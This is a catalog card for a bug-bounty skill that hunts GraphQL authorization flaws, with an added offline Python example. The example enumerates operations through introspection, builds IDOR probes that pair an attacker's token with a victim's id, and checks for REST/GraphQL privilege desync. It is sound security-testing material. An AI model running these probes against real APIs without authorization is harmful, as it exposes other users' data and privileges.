Hunt GraphQL authorization flaws
hunt-graphql (skill, setup, L1, ★1,791)
elementalsouls/Claude-BugHunter
What it does
Enumerate GraphQL schema and hunt IDOR, authz-bypass, cross-API desync
Best for
Bug bounty hunters working platform APIs (GitHub, Shopify or Stripe tier) where GraphQL mutations and REST endpoints write to the same backing state.
Inputs
- target /graphql endpoint
- GraphQL query and mutation names (from introspection)
Outputs
- schema catalog (types, queries, mutations)
- operation/argument schemas (which operations take an ID)
- IDOR proof (another user's object returned under the attacker's token)
- authz bypass (query or mutation callable without auth, or with a lower-privilege token)
- desync chain (REST vs GraphQL state mismatch)
Requires
- InQL (Burp extension)
- graphql-voyager
- curl
- Burp Collaborator (for out-of-band SSRF confirmation)
Preconditions
- GraphQL endpoint exists
- introspection enabled OR operation names enumerable (field suggestions in error messages, client JS bundles)
Failure modes
- introspection disabled and no other schema source
- strong per-field authz
- mutations require non-bypassable tokens
Trust signals
- Built from 12 public bug bounty reports
- Includes crown-jewel pattern: privilege revoked in REST but re-asserted in GraphQL
- Covers race-condition desync testing methodology
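The pipeline this card describes, as an added example (not code from the Claude-BugHunter skill): parse an introspection result to enumerate operations, flag every ID-bearing argument as an IDOR probe target, build the probe document to send with the attacker's token and the victim's id, judge the reply, and compare REST-reported roles with what GraphQL still honours (the crown-jewel desync pattern). The introspection reply, the attacker response, and both role tables are constructed inline so it runs offline; the operation names, ids and role names are assumptions, not from any real target.

```python
"""Added example: introspection -> IDOR candidates -> probe -> REST/GraphQL desync check."""
import json

# Trimmed introspection query; the real one also asks for interfaces, enums, etc.
INTROSPECTION_QUERY = """
query { __schema { queryType { name } mutationType { name }
  types { name fields { name args { name
    type { kind name ofType { kind name ofType { kind name } } } } } } } }
"""

# Constructed introspection response, shaped like a server reply (assumed schema).
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "fields": [
            {"name": "viewer", "args": []},
            {"name": "invoice", "args": [{"name": "id", "type": {
                "kind": "NON_NULL", "name": None,
                "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}}]}]},
        {"name": "Mutation", "fields": [
            {"name": "updateInvoice", "args": [
                {"name": "invoiceId", "type": {"kind": "SCALAR", "name": "ID", "ofType": None}},
                {"name": "memo", "type": {"kind": "SCALAR", "name": "String", "ofType": None}}]},
            {"name": "grantAdmin", "args": [{"name": "userId", "type": {
                "kind": "NON_NULL", "name": None,
                "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}}]}]},
        {"name": "Invoice", "fields": [{"name": "id", "args": []}, {"name": "memo", "args": []}]},
    ]}}}


def unwrap_type(t):
    """Follow NON_NULL / LIST wrappers down to the named type."""
    while t and t.get("name") is None and t.get("ofType"):
        t = t["ofType"]
    return t.get("name") if t else None


def enumerate_operations(intro):
    """Return {"query": {op: {arg: type}}, "mutation": {...}} from an introspection reply."""
    schema = intro["data"]["__schema"]
    roots = {"query": schema["queryType"]["name"],
             "mutation": (schema.get("mutationType") or {}).get("name")}
    by_name = {t["name"]: t for t in schema["types"]}
    ops = {}
    for kind, root in roots.items():
        ops[kind] = {}
        if not root or root not in by_name:
            continue
        for f in by_name[root].get("fields") or []:
            ops[kind][f["name"]] = {a["name"]: unwrap_type(a["type"]) for a in f.get("args") or []}
    return ops


def idor_candidates(ops):
    """Every operation taking an ID-typed or *Id-named argument is a probe target."""
    out = []
    for kind, fields in ops.items():
        for op, args in fields.items():
            for arg, typ in args.items():
                if typ == "ID" or arg.lower().endswith("id"):
                    out.append((kind, op, arg))
    return sorted(out)


def build_probe(kind, op, arg, victim_id, selection="id"):
    """Document to send with the ATTACKER's token but the VICTIM's id."""
    return "%s { %s(%s: %s) { %s } }" % (kind, op, arg, json.dumps(victim_id), selection)


def is_idor(response, victim_id):
    """IDOR proof: the victim's object came back without errors under the attacker's token."""
    if response.get("errors"):
        return False
    for obj in (response.get("data") or {}).values():
        if isinstance(obj, dict) and obj.get("id") == victim_id:
            return True
    return False


def privilege_desync(rest_roles, graphql_roles):
    """Crown-jewel pattern: roles GraphQL still honours after REST revoked them.
    Both inputs map user -> set of roles as observed through each API."""
    findings = []
    for user, gql in graphql_roles.items():
        extra = gql - rest_roles.get(user, set())
        if extra:
            findings.append((user, sorted(extra)))
    return findings


# Constructed observations: REST says u_7 lost admin, GraphQL mutations still allow it.
SAMPLE_ATTACKER_RESPONSE = {"data": {"invoice": {"id": "inv_42", "memo": "victim's memo"}}}
REST_ROLES = {"u_7": {"member"}}
GRAPHQL_ROLES = {"u_7": {"member", "admin"}}

if __name__ == "__main__":
    for kind, op, arg in idor_candidates(enumerate_operations(SAMPLE_INTROSPECTION)):
        print(build_probe(kind, op, arg, "inv_42"))
    print("IDOR:", is_idor(SAMPLE_ATTACKER_RESPONSE, "inv_42"))
    print("desync:", privilege_desync(REST_ROLES, GRAPHQL_ROLES))
```

In practice the probe document is sent twice per candidate, once with the victim's token to record the expected object and once with the attacker's token, and a match on the victim's id in the second reply is the IDOR proof the card lists. For the desync check, build `REST_ROLES` from the REST permissions endpoint immediately after a revoke and `GRAPHQL_ROLES` from which privileged mutations still succeed; anything left over is the REST-revoked, GraphQL-re-asserted state the trust signals describe.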